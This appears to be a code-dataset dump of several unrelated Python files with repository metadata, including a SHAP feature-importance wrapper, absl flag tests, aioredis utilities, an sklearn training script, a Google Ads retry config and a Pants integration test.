    def __init__(self, x_train, y_train, model):
        """Initialize a feature global explainer.

        :param x_train: input data
        :param y_train: output data
        :param model: the underlying black-box model to be interpreted
        """
        self.x_train = x_train
        self.y_train = y_train
        self.model = model

    def permutation_importance(self, use_eli5=False):
        """Rank global variable influence via permutation importance.

        :param use_eli5: bool; use the ELI5 implementation when True,
            otherwise the raw implementation
        :return: feature importance ranking plot
        """
        explainer = FeatureImportance(self.x_train, self.y_train, self.model)
        if use_eli5:
            return explainer.eli5_perm_importance()
        importance = explainer.permutation_importance()
        return explainer.vis_perm_importance(importance)

    def weights_importance(self):
        """Rank global variable influence via estimator weights.

        :return: an explanation of estimator parameters (weights)
        """
        explainer = FeatureImportance(self.x_train, self.y_train, self.model)
        return explainer.eli5_weights_importance(
            show=['feature_importances', 'target', 'description'])

    def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
        """Rank global variable influence via SHAP feature importance
        (average absolute marginal effect of each feature).

        :return: a summary plot visualized using SHAP
        """
        shap_explainer = ShapExplainer(
            self.x_train, self.model,
            explainer_type=explainer_type,
            background_sample=background_sample)
        return shap_explainer.shap_summary_plot(plot_type='bar')
| 37.773585 | 105 | 0.676823 | from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| true | true |
f72ed6bd8cbd39180af1615ae392cf981ff63a32 | 4,411 | py | Python | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional tests for Flag classes.
Most of the Flag classes are covered in the flags_test.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| 32.674074 | 79 | 0.717751 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| true | true |
f72ed6f3f3b067f75edf1591df918110a3cd1d90 | 71 | py | Python | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-01-28T03:54:19.000Z | 2022-01-28T03:54:19.000Z | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | null | null | null | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-02-17T19:57:45.000Z | 2022-02-17T19:57:45.000Z | #!/usr/bin/env python
from anti_viral_protocol import main
main.run()
| 14.2 | 36 | 0.774648 |
from anti_viral_protocol import main
main.run()
| true | true |
f72ed76a2412ba2f6fbe6587e6f523c5dadb2346 | 6,881 | py | Python | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
# NOTE: never put here anything else;
# just this basic types
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
"""Encodes arguments into redis bulk-strings array.
Raises TypeError if any of args not of bytearray, bytes, float, int, or str
type.
"""
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
"""Parse Redis connection URI.
Parse according to IANA specs:
* https://www.iana.org/assignments/uri-schemes/prov/redis
* https://www.iana.org/assignments/uri-schemes/prov/rediss
Also more rules applied:
* empty scheme is treated as unix socket path no further parsing is done.
* 'unix://' scheme is treated as unix socket path and parsed.
* Multiple query parameter values and blank values are considered error.
* DB number specified as path and as query parameter is considered error.
* Password specified in userinfo and as query parameter is
considered error.
"""
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| 27.8583 | 79 | 0.608923 | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| true | true |
f72ed7c91647a2ffe95753344f2a7f08a78ecf34 | 1,683 | py | Python | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | 5 | 2021-03-10T17:10:21.000Z | 2021-10-06T16:34:17.000Z | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | # Import libraries
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
#Otsustuspuud
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
# data_table.groupby("keeletase").A.plot(kind='kde')
#data_table.groupby("keeletase").A.hist(alpha=0.4)|
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder() #independent variable encoder
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
#Transforming values into percentages of total and splitting into target and features
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
# X_train, X_test, y_train, y_test =\
# train_test_split(features.loc[:,'A':"Z"], target_var, test_size = 0.5, random_state=1111)
# Get the dataset
# dataset = datasets.load_iris()
# Split the dataset into features and labels
X = features
y = target_var
# Split the dataset into training (80%) and testing (20%) data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
# Build the classifier and make prediction
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
# Print the confusion matrix
# Save the model to disk
joblib.dump(classifier, 'classifier.joblib')
| 25.5 | 108 | 0.764112 |
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder()
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
X = features
y = target_var
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
joblib.dump(classifier, 'classifier.joblib')
| true | true |
f72ed89ef91faf30d9d61698bce073331a1ee00a | 1,185 | py | Python | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| 28.902439 | 63 | 0.562025 | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| true | true |
f72ed8da97fec762efa00349e44eae5dbdee44f0 | 1,233 | py | Python | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
# Run once to start up, and then capture the file content.
run()
good_content = read_file(f)
# Edit the file.
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
# Re-run and confirm that the file was fixed.
run()
assert good_content == read_file(f)
| 30.073171 | 101 | 0.612328 |
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
run()
good_content = read_file(f)
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
run()
assert good_content == read_file(f)
| true | true |
f72ed91db2e8e38da901631f369f411c385dca7e | 1,057 | py | Python | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| 19.218182 | 45 | 0.689688 | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| true | true |
f72eda0648c579ea231b336ff3104e38d1b2f1b9 | 777 | py | Python | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
